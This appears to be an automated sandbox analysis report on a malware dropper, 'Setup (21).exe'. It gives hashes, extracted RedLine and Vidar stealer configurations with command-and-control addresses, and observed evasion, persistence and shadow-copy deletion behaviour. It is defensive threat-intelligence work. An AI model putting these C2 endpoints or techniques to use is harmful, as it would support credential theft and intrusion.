Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
11-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 1029-08-2021 11:37
210829-18htk4slyj 1028-08-2021 23:10
210828-rt8b9gzxn6 1028-08-2021 22:59
210828-zxgnh5j4w6 1028-08-2021 11:31
210828-xrjs66aknj 10Analysis
-
max time kernel
159s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-08-2021 22:39
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
Setup (23).exe
Resource
win10v20210408
General
-
Target
Setup (21).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
1
37.0.8.88:44263
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Extracted
redline
22.08
95.181.172.100:55640
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
redline
v1
195.2.78.163:25450
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2008 5116 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7608 5116 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9068 5116 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10356 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5536 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10176 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6900 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3156 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5768 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6252 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2936 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6372 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2108 5116 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7112 5116 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 13 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\jT9ljWrB8H2SDmiwcZPQyNar.exe family_redline C:\Users\Admin\Documents\nu51Bm0jwjCZXfWisMZjuUlk.exe family_redline behavioral28/memory/4452-330-0x000000000041A92A-mapping.dmp family_redline behavioral28/memory/4732-337-0x00000000058A0000-0x0000000005D9E000-memory.dmp family_redline behavioral28/memory/4760-287-0x000000000041A5EA-mapping.dmp family_redline behavioral28/memory/4732-286-0x000000000041A6E6-mapping.dmp family_redline behavioral28/memory/4760-279-0x0000000000400000-0x0000000000448000-memory.dmp family_redline behavioral28/memory/4732-276-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral28/memory/4696-275-0x000000000041A616-mapping.dmp family_redline behavioral28/memory/4696-271-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral28/memory/3424-251-0x0000000000D40000-0x0000000000D5B000-memory.dmp family_redline C:\Users\Admin\Documents\jT9ljWrB8H2SDmiwcZPQyNar.exe family_redline C:\Users\Admin\Documents\nu51Bm0jwjCZXfWisMZjuUlk.exe family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3632 created 2504 3632 WerFault.exe lDyGp02VzbDIUiSi84iUnU4h.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral28/memory/808-358-0x0000000000400000-0x0000000002402000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 55 IoCs
Processes:
DN285WvFY40Vo3pQjrXP92K8.exeXUV6vPsYpCU5h0OX1KBr3ePA.exeym5vryTqDPCLWaLwkXNcpDF4.exeIyAWo3HIaYK2enfqDaaLxk_Z.exeHGYCjbLD2lTVAEa8PUVxbSm2.exed_rbRdAwkUM3FRfL059OI5jN.exeUTvozCvgVVywSzZLa3TVaxAG.exeup_RX3dLyP9fcF3fJmZOtovo.exeVPj0hUPAj0E3dJkevh_aWd6D.execPlKfUNTpg7mJXht2DhaDJOZ.exejT9ljWrB8H2SDmiwcZPQyNar.exe1875xlBprgCQ3gKw9xrizZX9.exelDyGp02VzbDIUiSi84iUnU4h.exeKsw2BPZMcDG5H5CumnoX5El7.exenu51Bm0jwjCZXfWisMZjuUlk.exe6O3HGRIaWBdZoB20G7JWTmMP.exeGE8bIVNODDL62KupPYqp9x2h.exeNeKq7ifKebqVoGCQyqlPy4BS.exeyHGCwNSEUTB7dqa5o73ZeO50.exeULxrP04rJhVhjWNB0VmX89T_.exeXJHS6Vx2mDoCXR6a61Ec6SWF.exeYyI5EDaPb9x7q8_KtpF3drC3.exeuGmE7ZNudzFhsulIQN2tk8Zf.exeQ5pZL3v1i8oT6D1PqwPrbLAh.exeuED6jlI4PTuJuwIByjVd3_2r.exeuED6jlI4PTuJuwIByjVd3_2r.tmpjooyu.exemd8_8eus.exe6074099.exeDN285WvFY40Vo3pQjrXP92K8.exeXUV6vPsYpCU5h0OX1KBr3ePA.exe6O3HGRIaWBdZoB20G7JWTmMP.execPlKfUNTpg7mJXht2DhaDJOZ.exeKsw2BPZMcDG5H5CumnoX5El7.exeyHGCwNSEUTB7dqa5o73ZeO50.exeCleaner.exeSetup.exe11111.exerunvd.exeInlog.exeCleaner Installation.exeWEATHER Manager.exeVPN.exeaskinstall53.exeInlog.tmpMediaBurner2.exePBrowFile15.exeWEATHER Manager.tmpzhaoy-game.exeVPN.tmpLivelyScreenRecS1.9.exehBS_VbW.EXExtect12.exeMediaBurner2.tmpSHobudirivo.exepid process 1296 DN285WvFY40Vo3pQjrXP92K8.exe 3076 XUV6vPsYpCU5h0OX1KBr3ePA.exe 2120 ym5vryTqDPCLWaLwkXNcpDF4.exe 3828 IyAWo3HIaYK2enfqDaaLxk_Z.exe 1676 HGYCjbLD2lTVAEa8PUVxbSm2.exe 4016 d_rbRdAwkUM3FRfL059OI5jN.exe 3364 UTvozCvgVVywSzZLa3TVaxAG.exe 3424 up_RX3dLyP9fcF3fJmZOtovo.exe 808 VPj0hUPAj0E3dJkevh_aWd6D.exe 3892 cPlKfUNTpg7mJXht2DhaDJOZ.exe 3900 jT9ljWrB8H2SDmiwcZPQyNar.exe 1472 1875xlBprgCQ3gKw9xrizZX9.exe 2504 lDyGp02VzbDIUiSi84iUnU4h.exe 2304 Ksw2BPZMcDG5H5CumnoX5El7.exe 4040 nu51Bm0jwjCZXfWisMZjuUlk.exe 4028 6O3HGRIaWBdZoB20G7JWTmMP.exe 1016 GE8bIVNODDL62KupPYqp9x2h.exe 2596 NeKq7ifKebqVoGCQyqlPy4BS.exe 1284 yHGCwNSEUTB7dqa5o73ZeO50.exe 3640 ULxrP04rJhVhjWNB0VmX89T_.exe 1020 XJHS6Vx2mDoCXR6a61Ec6SWF.exe 1052 YyI5EDaPb9x7q8_KtpF3drC3.exe 1840 uGmE7ZNudzFhsulIQN2tk8Zf.exe 2772 Q5pZL3v1i8oT6D1PqwPrbLAh.exe 956 uED6jlI4PTuJuwIByjVd3_2r.exe 4320 uED6jlI4PTuJuwIByjVd3_2r.tmp 4456 jooyu.exe 4500 md8_8eus.exe 4540 6074099.exe 4696 DN285WvFY40Vo3pQjrXP92K8.exe 4732 XUV6vPsYpCU5h0OX1KBr3ePA.exe 4760 6O3HGRIaWBdZoB20G7JWTmMP.exe 4452 cPlKfUNTpg7mJXht2DhaDJOZ.exe 2312 Ksw2BPZMcDG5H5CumnoX5El7.exe 3080 yHGCwNSEUTB7dqa5o73ZeO50.exe 2252 Cleaner.exe 4444 Setup.exe 2128 11111.exe 220 runvd.exe 1088 Inlog.exe 4492 Cleaner Installation.exe 2736 WEATHER Manager.exe 3904 VPN.exe 4860 askinstall53.exe 1764 Inlog.tmp 4420 MediaBurner2.exe 4132 PBrowFile15.exe 4784 WEATHER Manager.tmp 5128 zhaoy-game.exe 5156 VPN.tmp 5208 LivelyScreenRecS1.9.exe 5248 hBS_VbW.EXE 5288 xtect12.exe 5432 MediaBurner2.tmp 5492 SHobudirivo.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
ym5vryTqDPCLWaLwkXNcpDF4.exeQ5pZL3v1i8oT6D1PqwPrbLAh.exenu51Bm0jwjCZXfWisMZjuUlk.exejT9ljWrB8H2SDmiwcZPQyNar.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ym5vryTqDPCLWaLwkXNcpDF4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ym5vryTqDPCLWaLwkXNcpDF4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Q5pZL3v1i8oT6D1PqwPrbLAh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Q5pZL3v1i8oT6D1PqwPrbLAh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nu51Bm0jwjCZXfWisMZjuUlk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nu51Bm0jwjCZXfWisMZjuUlk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jT9ljWrB8H2SDmiwcZPQyNar.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jT9ljWrB8H2SDmiwcZPQyNar.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup (21).exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (21).exe -
Loads dropped DLL 11 IoCs
Processes:
up_RX3dLyP9fcF3fJmZOtovo.exeuED6jlI4PTuJuwIByjVd3_2r.tmpCleaner Installation.exeInlog.tmpWEATHER Manager.tmpVPN.tmpMediaBurner2.tmppid process 3424 up_RX3dLyP9fcF3fJmZOtovo.exe 4320 uED6jlI4PTuJuwIByjVd3_2r.tmp 4320 uED6jlI4PTuJuwIByjVd3_2r.tmp 4492 Cleaner Installation.exe 1764 Inlog.tmp 1764 Inlog.tmp 4784 WEATHER Manager.tmp 4784 WEATHER Manager.tmp 5156 VPN.tmp 5156 VPN.tmp 5432 MediaBurner2.tmp -
Processes:
resource yara_rule C:\Users\Admin\Documents\jT9ljWrB8H2SDmiwcZPQyNar.exe themida C:\Users\Admin\Documents\ym5vryTqDPCLWaLwkXNcpDF4.exe themida C:\Users\Admin\Documents\nu51Bm0jwjCZXfWisMZjuUlk.exe themida C:\Users\Admin\Documents\GE8bIVNODDL62KupPYqp9x2h.exe themida C:\Users\Admin\Documents\ym5vryTqDPCLWaLwkXNcpDF4.exe themida C:\Users\Admin\Documents\Q5pZL3v1i8oT6D1PqwPrbLAh.exe themida behavioral28/memory/3900-246-0x0000000000D50000-0x0000000000D51000-memory.dmp themida behavioral28/memory/4040-273-0x00000000002D0000-0x00000000002D1000-memory.dmp themida behavioral28/memory/2772-255-0x0000000001010000-0x0000000001011000-memory.dmp themida behavioral28/memory/2120-250-0x0000000000990000-0x0000000000991000-memory.dmp themida C:\Users\Admin\Documents\jT9ljWrB8H2SDmiwcZPQyNar.exe themida C:\Users\Admin\Documents\nu51Bm0jwjCZXfWisMZjuUlk.exe themida C:\Users\Admin\Documents\GE8bIVNODDL62KupPYqp9x2h.exe themida C:\Users\Admin\Documents\Q5pZL3v1i8oT6D1PqwPrbLAh.exe themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Q5pZL3v1i8oT6D1PqwPrbLAh.exeym5vryTqDPCLWaLwkXNcpDF4.exejT9ljWrB8H2SDmiwcZPQyNar.exenu51Bm0jwjCZXfWisMZjuUlk.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Q5pZL3v1i8oT6D1PqwPrbLAh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ym5vryTqDPCLWaLwkXNcpDF4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jT9ljWrB8H2SDmiwcZPQyNar.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nu51Bm0jwjCZXfWisMZjuUlk.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 413 ipinfo.io 128 ipinfo.io 134 ipinfo.io 234 ipinfo.io 1607 ipinfo.io 1608 ipinfo.io 29 ipinfo.io 148 ip-api.com 199 ipinfo.io 209 ipinfo.io 214 ipinfo.io 415 ipinfo.io 30 ipinfo.io 637 geoiptool.com 211 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
jT9ljWrB8H2SDmiwcZPQyNar.exenu51Bm0jwjCZXfWisMZjuUlk.exeym5vryTqDPCLWaLwkXNcpDF4.exeQ5pZL3v1i8oT6D1PqwPrbLAh.exepid process 3900 jT9ljWrB8H2SDmiwcZPQyNar.exe 4040 nu51Bm0jwjCZXfWisMZjuUlk.exe 2120 ym5vryTqDPCLWaLwkXNcpDF4.exe 2772 Q5pZL3v1i8oT6D1PqwPrbLAh.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
DN285WvFY40Vo3pQjrXP92K8.exeXUV6vPsYpCU5h0OX1KBr3ePA.exe6O3HGRIaWBdZoB20G7JWTmMP.execPlKfUNTpg7mJXht2DhaDJOZ.exeKsw2BPZMcDG5H5CumnoX5El7.exedescription pid process target process PID 1296 set thread context of 4696 1296 DN285WvFY40Vo3pQjrXP92K8.exe DN285WvFY40Vo3pQjrXP92K8.exe PID 3076 set thread context of 4732 3076 XUV6vPsYpCU5h0OX1KBr3ePA.exe XUV6vPsYpCU5h0OX1KBr3ePA.exe PID 4028 set thread context of 4760 4028 6O3HGRIaWBdZoB20G7JWTmMP.exe 6O3HGRIaWBdZoB20G7JWTmMP.exe PID 3892 set thread context of 4452 3892 cPlKfUNTpg7mJXht2DhaDJOZ.exe cPlKfUNTpg7mJXht2DhaDJOZ.exe PID 2304 set thread context of 2312 2304 Ksw2BPZMcDG5H5CumnoX5El7.exe Ksw2BPZMcDG5H5CumnoX5El7.exe -
Drops file in Program Files directory 19 IoCs
Processes:
Setup.exeULxrP04rJhVhjWNB0VmX89T_.exedescription ioc process File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe ULxrP04rJhVhjWNB0VmX89T_.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe ULxrP04rJhVhjWNB0VmX89T_.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ULxrP04rJhVhjWNB0VmX89T_.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe ULxrP04rJhVhjWNB0VmX89T_.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini ULxrP04rJhVhjWNB0VmX89T_.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe -
Drops file in Windows directory 1 IoCs
Processes:
WerFault.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4844 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe 4984 2596 WerFault.exe NeKq7ifKebqVoGCQyqlPy4BS.exe 3564 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe 4956 2596 WerFault.exe NeKq7ifKebqVoGCQyqlPy4BS.exe 3632 2504 WerFault.exe lDyGp02VzbDIUiSi84iUnU4h.exe 2076 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe 5348 2596 WerFault.exe NeKq7ifKebqVoGCQyqlPy4BS.exe 5724 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe 5808 2596 WerFault.exe NeKq7ifKebqVoGCQyqlPy4BS.exe 6052 5208 WerFault.exe LivelyScreenRecS1.9.exe 1432 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe 5528 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe 5772 808 WerFault.exe VPj0hUPAj0E3dJkevh_aWd6D.exe 4872 1020 WerFault.exe XJHS6Vx2mDoCXR6a61Ec6SWF.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Ksw2BPZMcDG5H5CumnoX5El7.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Ksw2BPZMcDG5H5CumnoX5El7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Ksw2BPZMcDG5H5CumnoX5El7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Ksw2BPZMcDG5H5CumnoX5El7.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3156 schtasks.exe 5768 schtasks.exe 2936 schtasks.exe 2108 schtasks.exe 10356 schtasks.exe 5536 schtasks.exe 10176 schtasks.exe 7112 schtasks.exe 6900 schtasks.exe 6252 schtasks.exe 6372 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 11256 timeout.exe 6408 timeout.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 11040 vssadmin.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 7916 taskkill.exe 7496 taskkill.exe 9656 taskkill.exe 6084 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance -
Processes:
Setup (21).exeCleaner Installation.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (21).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (21).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e